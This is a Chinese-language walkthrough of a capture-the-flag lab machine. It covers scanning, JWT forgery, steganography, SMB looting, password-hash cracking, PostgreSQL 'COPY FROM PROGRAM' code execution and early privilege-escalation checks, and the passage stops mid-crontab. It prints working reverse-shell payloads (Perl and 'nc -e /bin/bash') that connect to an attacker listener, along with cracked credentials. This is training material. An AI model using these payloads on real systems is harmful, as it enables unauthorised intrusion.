![\"image-20240407141103180\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404071800964.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nrustscan -a 172.20.10.3 -- -A <\/code><\/pre>\nOpen 172.20.10.3:80\nOpen 172.20.10.3:139\nOpen 172.20.10.3:445\nOpen 172.20.10.3:5432\n\nPORT STATE SERVICE REASON VERSION\n80\/tcp open http syn-ack Apache httpd 2.4.57 ((Debian))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n| http-title: Login Page\n|_Requested resource was login.php\n|_http-server-header: Apache\/2.4.57 (Debian)\n139\/tcp open netbios-ssn syn-ack Samba smbd 4.6.2\n445\/tcp open netbios-ssn syn-ack Samba smbd 4.6.2\n5432\/tcp open postgresql syn-ack PostgreSQL DB 9.6.0 or later\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=zurrak\n| Subject Alternative Name: DNS:zurrak\n| Issuer: commonName=zurrak\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-10-20T19:29:16\n| Not valid after: 2033-10-17T19:29:16\n| MD5: 2c24:bdb8:b7d7:8fa8:51f0:1be2:2625:3a9d\n| SHA-1: 086e:bf83:1204:d0ef:0230:4290:8a92:b641:d3f4:ceaf\n| -----BEGIN CERTIFICATE-----\n| MIIC7zCCAdegAwIBAgIUTdKMVheATMcefGITp05Zwlj8vsgwDQYJKoZIhvcNAQEL\n| BQAwETEPMA0GA1UEAwwGenVycmFrMB4XDTIzMTAyMDE5MjkxNloXDTMzMTAxNzE5\n| MjkxNlowETEPMA0GA1UEAwwGenVycmFrMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A\n| MIIBCgKCAQEA1mhNG6o60cGsrq4iA6Tw2S6IDWRmx6PBz7V8e137c29wNuxu\/NSe\n| Xr8LWR6lbjI1SJFnn380kI+QoXpUx2dGc7coHJF+ZXZ8spl0mvPvGPRlc3SaCk5c\n| 3O88NOgIfA5rEwHdSdYdzBsmxaifhjibW+CPm9OMKmrhhaxeusfSF0Z2PPQiRF3r\n| zqrvYEhcjbGy2MJrQqVRiT17WHp0IxzErIsAaOICbEkWK5cyraG67WIT34SZc\/EG\n| VTbEGxm3uILog4pVePNP1wrObG1RAnvdePZLYqy4f+SGqSERo+9OmAmP3Wlpo43U\n| bZlwu1NCY81LV\/T5htm0as6Euqfa7rPfEQIDAQABoz8wPTAJBgNVHRMEAjAAMBEG\n| A1UdEQQKMAiCBnp1cnJhazAdBgNVHQ4EFgQUWAXLgNI0sXpXQKbUVFqdGH5EfNAw\n| DQYJKoZIhvcNAQELBQADggEBAIAk\/vaV6QkjotcEIm7pT1gYZVdngBBoge9WYse9\n| suUMhoQvXjep6MoLG8wCPcNNw9GpCSQrzOuxfiovhk0WfLnRDJ9XdyL0GTt3lELh\n| kdIdeJUZh4MrhjyCrzASQlbQkfrMhiOOhIedtrfb1I9XSFZqFTjYRjsYRBFRc6Mc\n| oTkR3KurLUg8cqYLa5f7j9TLpgGIfNlUfvw7WyrSX0sIL2I5kMHwLP1ayWHVspXr\n| lq6PWoN6UVW4+NKNok7ty3CxOvVUabAlTiqkRRK3Hxr5e7y+oCIjfrYSQyl3JrRH\n| zHHGJB6H9nMbKafvqiBpdg8QL\/Fp2mvTalwfRKP8QEhRZeY=\n|_-----END CERTIFICATE-----\n| fingerprint-strings: \n| SMBProgNeg: \n| SFATAL\n| VFATAL\n| C0A000\n| Munsupported frontend protocol 65363.19778: server supports 3.0 to 3.0\n| Fpostmaster.c\n| L2195\n|_ RProcessStartupPacket\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port5432-TCP:V=7.94SVN%I=7%D=4\/7%Time=66123916%P=x86_64-pc-linux-gnu%r(\nSF:SMBProgNeg,8C,"E\\0\\0\\0\\x8bSFATAL\\0VFATAL\\0C0A000\\0Munsupported\\x20front\nSF:end\\x20protocol\\x2065363\\.19778:\\x20server\\x20supports\\x203\\.0\\x20to\\x2\nSF:03\\.0\\0Fpostmaster\\.c\\0L2195\\0RProcessStartupPacket\\0\\0");\n\nHost script results:\n| smb2-security-mode: \n| 3:1:1: \n|_ Message signing enabled but not required\n| smb2-time: \n| date: 2024-04-07T06:11:59\n|_ start_date: N\/A\n|_clock-skew: 18s\n| p2p-conficker: \n| Checking for Conficker.C or higher...\n| Check 1 (port 39463\/tcp): CLEAN (Couldn't connect)\n| Check 2 (port 52224\/tcp): CLEAN (Couldn't connect)\n| Check 3 (port 47754\/udp): CLEAN (Timeout)\n| Check 4 (port 54992\/udp): CLEAN (Failed to receive data)\n|_ 0\/4 checks are positive: Host is CLEAN or ports are blocked<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -u http:\/\/172.20.10.3 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code><\/pre>\n\/vendor (Status: 301) [Size: 311] [--> http:\/\/172.20.10.3\/vendor\/]\n\/server-status (Status: 403) [Size: 276]<\/code><\/pre>\ngobuster dir -u http:\/\/172.20.10.3 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n\/.php (Status: 403) [Size: 276]\n\/index.php (Status: 302) [Size: 1270] [--> login.php]\n\/login.php (Status: 200) [Size: 2041]\n\/admin.php (Status: 302) [Size: 2624] [--> login.php]\n\/vendor (Status: 301) [Size: 311] [--> http:\/\/172.20.10.3\/vendor\/]\n\/index_.php (Status: 200) [Size: 200]\n\/.php (Status: 403) [Size: 276]\n\/server-status (Status: 403) [Size: 276]<\/code><\/pre>\n\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.3<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.3\n+ Target Hostname: 172.20.10.3\n+ Target Port: 80\n+ Start Time: 2024-04-07 02:15:23 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.57 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ Root page \/ redirects to: login.php\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/login.php: Admin login page\/section found.\n+ \/composer.json: PHP Composer configuration file reveals configuration information. See: https:\/\/getcomposer.org\/\n+ \/composer.lock: PHP Composer configuration file reveals configuration information. See: https:\/\/getcomposer.org\/\n+ 8102 requests: 0 error(s) and 5 item(s) reported on remote host\n+ End Time: 2024-04-07 02:15:43 (GMT-4) (20 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u6316\u6398<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20240407141735964\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u654f\u611f\u7aef\u53e3\u63a2\u6d4b<\/h3>\n
\u5f00\u542f\u4e86\u4e00\u4e2asmb<\/code>\u670d\u52a1\u548c\u4e00\u4e2aPostgreSQL<\/code>\u6570\u636e\u5e93\uff1a<\/p>\n\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n
enum4linux 172.20.10.3<\/code><\/pre>\n<\/div><\/p>\n\u795e\u9b54\u60c5\u51b5\u3002\u3002\u3002\u3002\u6362\u4e00\u4e2a\u8bd5\u8bd5\uff1a<\/p>\n
smbmap -H 172.20.10.3<\/code><\/pre>\n<\/div><\/p>\n\u770b\u6765\u6682\u65f6\u8d70\u4e0d\u901a\u8fd9\u6761\u8def\u4e86\u3002<\/p>\n
\u6e90\u7801\u5206\u6790<\/h3>\n
\u6253\u5f00\u6e90\u7801\u7684\u65f6\u5019\u770b\u5230\u7ed9\u51fa\u4e86\u8d26\u53f7\u5bc6\u7801\u4e86\uff1a<\/p>\n
<!-- username:internal@zurrak.htb && password:testsite --><\/code><\/pre>\n\u767b\u5f55\u4e00\u4e0b\uff0c\u7a7a\u767d\u9875\uff0c\u6e90\u4ee3\u7801\u53d1\u73b0\uff1a<\/p>\n
<!-- <a class="navbar-brand" href="admin.php">Admin Panel<\/a>--><\/code><\/pre>\n\u8fd4\u56de\u770b\u4e00\u4e0b\u8fd9\u4e2aadmin.php<\/code>\uff0c\u6ca1\u6709\u53d1\u751f\u53d8\u5316\uff0c\u5565\u90fd\u6ca1\u6709\u3002\u3002<\/p>\n\u654f\u611f\u76ee\u5f55\u5206\u6790<\/h3>\n
\u67e5\u770b\u4e00\u4e0bindex_.php<\/code>\uff1a<\/p>\neyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vZXhhbXBsZS5vcmciLCJhdWQiOiJodHRwOi8vZXhhbXBsZS5jb20iLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.gOEkQc3YCCIIjE-GxU0UTa9Lx6hQwwk5zYfO4pZQZt4<\/code><\/pre>\n\u5206\u6210\u4e09\u6bb5\uff0c\u770b\u4e0a\u53bb\u50cf\u662fjwt\uff0c\u4e22\u7f51\u7ad9<\/a>\u4e0a\u770b\u770b\uff1a<\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u641c\u7d22\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\neyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjpmYWxzZSwiaWF0IjoxMzU2OTk5NTI0LCJuYmYiOjEzNTcwMDAwMDB9.ufkwBsusc4IEYCCRszCbcSEv6irCtUSx-Uq08OThxso<\/code><\/pre>\n\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u4f2a\u9020JWT<\/h3>\n
\u5b58\u5728isAdmin<\/code>\u5b57\u6bb5\uff0c\u4f2a\u9020\u4e00\u4e0b\u8bf7\u6c42\uff1a<\/p>\n<\/div><\/p>\n\u8fd8\u5dee\u4e00\u4e2a\u5bc6\u94a5\uff0c\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n
python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjpmYWxzZSwiaWF0IjoxMzU2OTk5NTI0LCJuYmYiOjEzNTcwMDAwMDB9.ufkwBsusc4IEYCCRszCbcSEv6irCtUSx-Uq08OThxso -C -d \/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5\u4f2a\u9020\u4e00\u4e0b\u8bf7\u6c42\uff1a<\/p>\n
<\/div><\/p>\neyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjp0cnVlLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.gBpFlpNfVUBlv9HuqXqVzRtaHR265PFagumX_OAKCMY<\/code><\/pre>\n\u5c1d\u8bd5\u4f7f\u7528\u8fd9\u4e2atoken\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u56fe\u7247\u9690\u5199<\/h3>\n
\u4e2d\u95f4\u63d0\u793a\u5b58\u5728\u9690\u5199\u4e86\uff0c\u5c1d\u8bd5\u63d0\u53d6\u4e00\u4e0b\uff1a<\/p>\n
http:\/\/172.20.10.3\/zurrakhorse.jpg\nhttp:\/\/172.20.10.3\/zurraksnake.jpg\nhttp:\/\/172.20.10.3\/zurrakhearts.jpg<\/code><\/pre>\n\u4e0b\u8f7d\u4e00\u4e0b\uff0c\u53d1\u73b0\u90fd\u85cf\u4e86\u4e1c\u897f\uff0c\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u653e\u5230\u672c\u5730\u6765\uff0c\u53cd\u7f16\u8bd1\u4e00\u4e0b\uff1a<\/p>\n
int __cdecl main(int argc, const char **argv, const char **envp)\n{\n __int64 v4; \/\/ [rsp+20h] [rbp-60h]\n __int64 v5; \/\/ [rsp+28h] [rbp-58h]\n __int64 v6; \/\/ [rsp+30h] [rbp-50h]\n __int64 v7; \/\/ [rsp+38h] [rbp-48h]\n __int64 v8; \/\/ [rsp+40h] [rbp-40h]\n __int64 v9; \/\/ [rsp+48h] [rbp-38h]\n char v10; \/\/ [rsp+50h] [rbp-30h]\n\n _main(*(_QWORD *)&argc, argv, envp);\n LODWORD(v9) = 115;\n LODWORD(v8) = 116;\n LODWORD(v7) = 97;\n LODWORD(v6) = 99;\n LODWORD(v5) = 101;\n LODWORD(v4) = 118;\n c(&v10, 105i64, 108i64, 111i64, v4, v5, v6, v7, v8, v9);\n printf("classified\\n");\n return 0;\n}<\/code><\/pre>\n__int64 c(char *a1, unsigned int a2, ...)\n{\n __int64 result; \/\/ rax\n unsigned int *v3; \/\/ ST20_8\n unsigned int *v4; \/\/ rax\n va_list v5; \/\/ [rsp+20h] [rbp-10h]\n char i; \/\/ [rsp+2Fh] [rbp-1h]\n char *v7; \/\/ [rsp+40h] [rbp+10h]\n va_list va; \/\/ [rsp+50h] [rbp+20h]\n\n va_start(va, a2);\n v7 = a1;\n va_copy(v5, va);\n result = a2;\n for ( i = a2; i; i = result )\n {\n sprintf(v7, "%s%c", v7, (unsigned int)i, v5);\n v4 = v3;\n v5 = (va_list)(v3 + 2);\n result = *v4;\n }\n return result;\n}<\/code><\/pre>\n\u8fd9\u6bb5\u4ee3\u7801\u6211\u770b\u7684\u4e5f\u8ff7\u8ff7\u7cca\u7cca\uff0c\u4f46\u662f\u4e0a\u9762main\u51fd\u6570\u5b58\u50a8\u4e86\u4e00\u4e2a\u6570\u7ec4\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n
105,108,111,118,110,99,97,116,115<\/code><\/pre>\n\u8f6c\u5316\u6210\u5b57\u7b26\u4e32\u4e3a\uff1a<\/p>\n
<\/div><\/p>\n\u6545\u5f97\u51fa\u8d26\u53f7\u5bc6\u7801\uff1a<\/p>\n
asli\nilovncats<\/code><\/pre>\n\u5c1d\u8bd5ssh\u767b\u5f55\uff0c\u53d1\u73b0\u9519\u8bef\uff1a<\/p>\n
ssh asli@172.20.10.3\nssh: connect to host 172.20.10.3 port 22: Connection refused<\/code><\/pre>\n\u9519\u8bef\u5c1d\u8bd5smb\u8fde\u63a5\uff1a<\/p>\n
SMB\u8fde\u63a5<\/h3>\n
\u5148\u63a2\u6d4b\u4e00\u4e0b\uff1a<\/p>\n
smbmap -u asli -p ilovncats -H 172.20.10.3<\/code><\/pre>\n<\/div><\/p>\nwhat\uff1f<\/p>\n
smbclient \/\/172.20.10.3\/share -U asli --password ilovncats<\/code><\/pre>\n\u4e5f\u8fde\u4e0d\u4e0a\u53bb\uff0c\u96be\u9053\u662f\u5bc6\u7801\u641e\u9519\u4e86\uff1f<\/p>\n
\u62ffGhidra<\/code>\u770b\u770b\uff1a<\/p>\nint __cdecl main(int _Argc,char **_Argv,char **_Env)\n\n{\n undefined1 (*pauVar1) [10];\n undefined8 uVar2;\n undefined8 uVar3;\n FILE local_208 [10];\n\n __main();\n uVar3 = 0x6f;\n uVar2 = 0x6c;\n pauVar1 = (undefined1 (*) [10])0x69;\n c(local_208,'i',0x6c,0x6f,0x76,0x65,99,0x61,0x74,0x73);\n printf("classified\\n",pauVar1,uVar2,uVar3);\n return 0;\n}<\/code><\/pre>\n<\/div><\/p>\n\u554a\u3002\u3002\u3002\u3002\u3002<\/p>\n
smbclient \/\/172.20.10.3\/share -U asli --password ilovecats<\/code><\/pre>\n\u7136\u540e\u5728\u6f2b\u957f\u7684\u4fe1\u606f\u641c\u96c6\u8fc7\u7a0b\u4e2d\u627e\u5230\u4e86\u4e00\u4e2a\u786c\u76d8\u6587\u4ef6\u3002\u3002\u3002\u3002<\/p>\n
Try "help" to get a list of possible commands.\nsmb: \\> ls\n . D 0 Fri Oct 20 17:14:00 2023\n .. D 0 Fri Oct 20 16:36:51 2023\n DONTDELETE D 0 Fri Oct 20 23:44:44 2023\n operations D 0 Sat Oct 21 00:04:30 2023\n backup.reg N 1792 Sun Jul 24 01:30:09 2011\n human_resources D 0 Sun Apr 2 01:30:09 2017\n launch_options.txt N 21 Tue Dec 13 22:55:16 2022\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\> cd operations\\\nsmb: \\operations\\> ls\n . D 0 Sat Oct 21 00:04:30 2023\n .. D 0 Fri Oct 20 17:14:00 2023\n binaries D 0 Tue Nov 14 04:08:42 2023\n operators.txt N 118 Tue Dec 18 01:30:09 2001\n New folder D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\> get operators.txt \ngetting file \\operations\\operators.txt of size 118 as operators.txt (3.2 KiloBytes\/sec) (average 3.2 KiloBytes\/sec)\nsmb: \\operations\\> cd New folder\\\ncd \\operations\\New\\: NT_STATUS_OBJECT_NAME_NOT_FOUND\nsmb: \\operations\\> ls\n . D 0 Sat Oct 21 00:04:30 2023\n .. D 0 Fri Oct 20 17:14:00 2023\n binaries D 0 Tue Nov 14 04:08:42 2023\n operators.txt N 118 Tue Dec 18 01:30:09 2001\n New folder D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\> cd 'New folder'\ncd \\operations\\'New\\: NT_STATUS_OBJECT_NAME_NOT_FOUND\nsmb: \\operations\\> cd "New folder"\nsmb: \\operations\\New folder\\> ls \n . D 0 Tue Dec 18 01:30:09 2001\n .. D 0 Sat Oct 21 00:04:30 2023\n deploy D 0 Fri Oct 20 23:52:42 2023\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\> cd deploy\\\nsmb: \\operations\\New folder\\deploy\\> ls\n . D 0 Fri Oct 20 23:52:42 2023\n .. D 0 Tue Dec 18 01:30:09 2001\n 3 D 0 Tue Dec 18 01:30:09 2001\n 2 D 0 Tue Dec 18 01:30:09 2001\n 4 D 0 Tue Dec 18 01:30:09 2001\n 1 D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\> cd 1\nsmb: \\operations\\New folder\\deploy\\1\\> ls\n . D 0 Tue Dec 18 01:30:09 2001\n .. D 0 Fri Oct 20 23:52:42 2023\n read.txt N 15 Tue Dec 18 01:30:09 2001\n approved D 0 Tue Dec 18 01:30:09 2001\n declined D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\1\\> cd ..\/2\nsmb: \\operations\\New folder\\deploy\\2\\> ls\n . D 0 Tue Dec 18 01:30:09 2001\n .. D 0 Fri Oct 20 23:52:42 2023\n read.txt N 15 Tue Dec 18 01:30:09 2001\n approved D 0 Tue Dec 18 01:30:09 2001\n declined D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\2\\> cd ..\/3\nsmb: \\operations\\New folder\\deploy\\3\\> ls\n . D 0 Tue Dec 18 01:30:09 2001\n .. D 0 Fri Oct 20 23:52:42 2023\n latest D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\3\\> cd ..\/4\nsmb: \\operations\\New folder\\deploy\\4\\> ls\n . D 0 Tue Dec 18 01:30:09 2001\n .. D 0 Fri Oct 20 23:52:42 2023\n read.txt N 15 Tue Dec 18 01:30:09 2001\n approved D 0 Tue Dec 18 01:30:09 2001\n declined D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\4\\> cd ..\/3\nsmb: \\operations\\New folder\\deploy\\3\\> cd latest\\\nsmb: \\operations\\New folder\\deploy\\3\\latest\\> ls\n . D 0 Tue Dec 18 01:30:09 2001\n .. D 0 Tue Dec 18 01:30:09 2001\n approved D 0 Tue Oct 24 16:21:21 2023\n declined D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\3\\latest\\> cd approved\\\nsmb: \\operations\\New folder\\deploy\\3\\latest\\approved\\> ls\n . D 0 Tue Oct 24 16:21:21 2023\n .. D 0 Tue Dec 18 01:30:09 2001\n zurrak.old.vmdk N 713883648 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\3\\latest\\approved\\> \nsmb: \\operations\\New folder\\deploy\\3\\latest\\approved\\> get zurrak.old.vmdk \ngetting file \\operations\\New folder\\deploy\\3\\latest\\approved\\zurrak.old.vmdk of size 713883648 as zurrak.old.vmdk (34234.5 KiloBytes\/sec) (average 34174.1 KiloBytes\/sec)\nsmb: \\operations\\New folder\\deploy\\3\\latest\\approved\\> cd ..\/\nsmb: \\operations\\New folder\\deploy\\3\\latest\\> cd declined\\\nsmb: \\operations\\New folder\\deploy\\3\\latest\\declined\\> ls\n . D 0 Tue Dec 18 01:30:09 2001\n .. D 0 Tue Dec 18 01:30:09 2001\n\n 9232860 blocks of size 1024. 6042972 blocks available\nsmb: \\operations\\New folder\\deploy\\3\\latest\\declined\\> exit<\/code><\/pre>\ncat operators.txt \nemir:Tlyu4#f\njohn:O0p12Az\nfreddie:KAsz241\nalbert:Lqak25r4\n\nplease change your credentials after reaching endpoint <\/code><\/pre>\n\u5c1d\u8bd5ssh\u767b\u5f55\uff0c\u4f46\u662f\u90fd\u5931\u8d25\u4e86\uff0c\u521b\u5efa\u865a\u62df\u673a\uff0c\u6211\u9009\u62e9\u4ee5\u63a5\u53d7\u5ea6\u6700\u5e7f\u7684vmware16.0<\/code>\u8fdb\u884c\u521b\u5efa\uff0c\u4f46\u662f\u62a5\u9519\u4e86\uff1a<\/p>\n<\/div><\/p>\n\u4fee\u6539\u4e3a17.0 \u6210\u529f\uff01<\/p>\n
<\/div><\/p>\n\u7a76\u6781\u5957\u5a03\uff01\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\nwhat\uff1f\u626b\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u5988\u5440\uff0c\u6211\u771f\u7684\u3002\u3002\u3002grub\u4e00\u4e0b\uff01<\/p>\n
<\/div>
\n<\/div><\/p>\n\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u6587\u4ef6\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\nocr \u4e00\u4e0b\uff0c\u5c1d\u8bd5hash\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n
postgres:$6$ZaTjsuy0$rBmhDDcT45A.p6chCl53MNn3c3k2lKjSn5sneyxOxaVpozADMVScztCYmdyexb4Gy7IvwlbBwzvRd.krKqT1L\/:19654:0:99999:7:::<\/code><\/pre>\n\n\u8fd9\u91cc\u641e\u9519\u597d\u591a\u6b21\u4e86\uff0c\u5efa\u8bae\u76f4\u63a5\u590d\u5236\u8fd9\u4e2a\u8282\u7701\u65f6\u95f4\u3002<\/p>\n<\/blockquote>\n
john shadow.txt --wordlist=\/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zurrak]\n\u2514\u2500$ john shadow.txt --wordlist=\/usr\/share\/wordlists\/rockyou.txt \nUsing default input encoding: UTF-8\nLoaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256\/256 AVX2 4x])\nCost 1 (iteration count) is 5000 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nballer15 (postgres) \n1g 0:00:00:09 DONE (2024-04-07 05:02) 0.1106g\/s 3115p\/s 3115c\/s 3115C\/s chrisd..skate123\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n\u627e\u5230\u5bc6\u7801\u4e86\uff01<\/p>\n
\u9664\u6b64\u4e4b\u5916\uff0c\u6211\u4eec\u53d1\u73b0\u91cc\u9762\u7684root\u4e5f\u6709hash\u5bc6\u7801\uff0c\u5c1d\u8bd5\u4e5f\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u6211\u5c31\u4e0d\u5c1d\u8bd5\u4e86\uff08\u5b9e\u9645\u4e0a\u5df2\u7ecf\u641e\u4e86\uff0c\u53d1\u73b0\u7206\u7834\u4e0d\u51fa\u6765\u4f30\u8ba1\u662f\u54ea\u4e2a\u5b57\u6bcd\u641e\u9519\u4e86\uff0c\u61d2\u5f97\u641e\u4e86\uff09<\/p>\n
POSTGRESQL\u8fde\u63a5<\/h3>\n
https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-postgresql<\/a><\/p>\npsql -h <host> -p <port> -U <username> -W <password> <database> # Remote connection\npsql -h 172.20.10.3 -p 5432 -U postgres <\/code><\/pre>\n\u67e5\u8be2\u5185\u5bb9\uff0c\u4f46\u662f\u5b9e\u5728\u9ebb\u70e6\uff0c\u6211\u4e5f\u4e0d\u592a\u4f1a\u53ea\u80fd\u4e00\u4e2a\u4e00\u4e2a\u67e5\uff0c\u5c1d\u8bd5\u4f7f\u7528\u63d0\u4f9b\u7684poc\u5b9e\u73b0rce\uff01<\/p>\n
#PoC\nDROP TABLE IF EXISTS cmd_exec;\nCREATE TABLE cmd_exec(cmd_output text);\nCOPY cmd_exec FROM PROGRAM 'id';\nSELECT * FROM cmd_exec;\nDROP TABLE IF EXISTS cmd_exec;\n\n#Reverse shell\n#Notice that in order to scape a single quote you need to put 2 single quotes\nCOPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';<\/code><\/pre>\nCOPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"172.20.10.8:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';<\/code><\/pre>\n\u4f3c\u4e4e\u4e0d\u884c\uff0c\u6362\u4e00\u4e2a\uff1a<\/p>\n
DROP TABLE IF EXISTS cmd_exec;\nCREATE TABLE cmd_exec(cmd_output text);\nCOPY cmd_exec FROM PROGRAM 'nc -e \/bin\/bash 172.20.10.8 1234';\nSELECT * FROM cmd_exec;<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) postgres@zurrak:\/$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/fusermount3\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n(remote) postgres@zurrak:\/$ find \/ -writable -type f 2>\/dev\/null\n\/var\/log\/postgresql\/postgresql-15-main.log.2.gz\n\/var\/log\/postgresql\/postgresql-15-main.log.1\n\/var\/log\/postgresql\/postgresql-15-main.log\n(remote) postgres@zurrak:\/$ cd \/home\n(remote) postgres@zurrak:\/home$ ls\npostgres\n(remote) postgres@zurrak:\/home$ cd postgres\/\n(remote) postgres@zurrak:\/home\/postgres$ ls\nemergency.sh user.txt\n(remote) postgres@zurrak:\/home\/postgres$ cat user.txt \nfe8f97f109ceb0362c95e60338c4c1a8\n(remote) postgres@zurrak:\/home\/postgres$ ls -la\ntotal 16\ndrwxr-xr-x 2 postgres postgres 4096 Oct 24 18:03 .\ndrwxr-xr-x 3 root root 4096 Oct 20 19:06 ..\n-rw------- 1 postgres postgres 28 Oct 24 16:47 emergency.sh\n-rw-r--r-- 1 postgres postgres 33 Oct 20 20:23 user.txt\n(remote) postgres@zurrak:\/home\/postgres$ cat emergency.sh \necho "root:1234" | chpasswd\n(remote) postgres@zurrak:\/home\/postgres$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job 